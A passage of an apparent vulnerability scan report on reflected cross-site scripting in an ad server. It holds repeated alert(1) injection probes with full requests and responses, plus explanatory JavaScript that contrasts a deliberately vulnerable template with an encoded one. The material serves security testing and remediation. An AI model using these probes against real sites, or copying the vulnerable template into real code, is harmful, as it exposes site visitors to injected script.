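const singleQuotePayload = { snr: "doubleclickcafe4'-alert(1)-'e519a003fdb", pos: 'Middle1C' };
const doubleQuotePayload = { camp: 'Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e' };

// Run directly to see each configuration: the unencoded builds fire alert, the encoded ones do not.
for (const [label, params, enc, quote] of [
  ['single-quoted literal, echoed as-is', singleQuotePayload, identity, "'"],
  ['double-quoted literal, echoed as-is', doubleQuotePayload, identity, '"'],
  ['single-quoted literal, strict encode', singleQuotePayload, strictUrlEncode, "'"],
  ['double-quoted literal, strict encode', doubleQuotePayload, strictUrlEncode, '"'],
]) {
  const r = demo(params, enc, quote);
  console.log(label + ': ' + (r.alertCalls ? 'alert fired' : 'no execution'));
}
```

Two things to check in any patch for this class of finding. First, encodeURIComponent and most URL encoders leave the single quote unencoded because RFC 3986 lists it as unreserved, so the 3.10-style payload survives a naive encode and only the double-quote variant is stopped. Second, the literal here wraps HTML, so a value must be safe for both the JavaScript-string layer and the HTML-attribute layer; strict percent-encoding handles both in one step by leaving nothing but unreserved characters and %XX escapes. The /adj responses are JavaScript built around document.write, which is how a publisher page loads them through a script tag, so code that breaks out of the literal runs in the embedding page's origin rather than the ad server's.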

3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c6"-alert(1)-"f1d869cb71d was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm
...[SNIP]...

3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33049'-alert(1)-'ef4c6349c56 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm
...[SNIP]...
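Findings 3.22 and 3.23 differ only in which quotation mark the probe carries, because the click URL is echoed into a JavaScript string literal and the scanner does not know in advance which delimiter wraps it, so it tries both. The following added example, which is not code from the report or from the ad server, models that literal and shows why a '-alert(1)-' probe executes in a single-quoted literal (and a "-alert(1)-" probe in a double-quoted one) while the same characters, encoded for the context, do not. The function names, the simplified var url = '...'; document.write(...) template and the shortened click URL are assumptions for the demonstration; the report's response excerpts only show the URL appearing inside document.write('...') and, further down, next to var fscUrl = url;.

```javascript
// Added example: models the JavaScript string literal the report describes
// and shows why a  '-alert(1)-'  probe runs while the same text, encoded for
// the context, stays inert. Not code from the scan report or the ad server;
// all names and the simplified template are assumptions.

// Vulnerable template. The click URL is concatenated into a quoted literal
// (quote is "'" or '"', the two contexts the report probes) and the literal
// is later written out as HTML.
function buildAdScriptVulnerable(clickUrl, quote) {
  return 'var url = ' + quote + clickUrl + quote + ';\n' +
         "document.write('<a href=\"' + url + '\">ad</a>');";
}

// Outer context: HTML attribute. Decoded last by the browser, so encoded first.
function htmlAttrEscape(s) {
  return String(s).replace(/[&<>"']/g, function (ch) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' }[ch];
  });
}

// Inner context: JavaScript string literal. Everything outside a conservative
// allow-list becomes \xHH or \uHHHH, so no input character can close the
// literal, begin a backslash escape, or (once the string is written as HTML)
// open a tag or comment. U+2028/U+2029 are covered because they are not in
// the allow-list either.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9,._:\/?=&#%;-]/g, function (ch) {
    var code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + ('0' + code.toString(16)).slice(-2)
      : '\\u' + ('000' + code.toString(16)).slice(-4);
  });
}

// Hardened template: same shape, value encoded for both contexts in order.
function buildAdScriptSafe(clickUrl, quote) {
  return 'var url = ' + quote + jsStringEscape(htmlAttrEscape(clickUrl)) + quote + ';\n' +
         "document.write('<a href=\"' + url + '\">ad</a>');";
}

// Compile a generated script and run it against stub document/alert objects,
// returning what it wrote and whether alert() fired. new Function compiles
// only; the call binds the stubs to the names document and alert.
function runAdScript(script) {
  var written = [];
  var alerts = [];
  var fn = new Function('document', 'alert', script);
  fn({ write: function (html) { written.push(String(html)); } },
     function (v) { alerts.push(v); });
  return { written: written, alerts: alerts };
}

// Constructed inputs: the report's pos-parameter probes on a shortened click URL.
var PROBE_SINGLE = "http://www.nytimes.com/adx/bin/adx_click.html?type=goto&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=x";
var PROBE_DOUBLE = 'http://www.nytimes.com/adx/bin/adx_click.html?type=goto&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=x';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runAdScript(buildAdScriptVulnerable(PROBE_SINGLE, "'")).alerts); // [ 1 ]
  console.log(runAdScript(buildAdScriptSafe(PROBE_SINGLE, "'")).alerts);       // []
}
```

Run it with node: the vulnerable template reports that alert fired with 1, the hardened one reports nothing fired and the probe text survives as plain data in the href. Two points go beyond the canned remediation text. Escaping for the JavaScript literal on its own is not enough, because the literal is afterwards written out as HTML, so the value needs HTML-attribute encoding applied first and JavaScript-string encoding second, the reverse of the order in which the browser decodes. And since the response is served as application/x-javascript to be loaded by the publisher's page, whatever is injected here runs in that page's origin, not the ad server's.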

3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfd08'-alert(1)-'a8a71a52983 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 304c3"-alert(1)-"820c38f512d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
va
...[SNIP]...

3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd88d'-alert(1)-'c98da69b678 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55441"-alert(1)-"1ff26f2efc9 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fs
...[SNIP]...

3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ddd'-alert(1)-'49ddae20877 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582d2"-alert(1)-"b947319b053 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFoun
...[SNIP]...

3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e573'-alert(1)-'e1385978014 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:51:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88f77"-alert(1)-"167dad5fe8 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

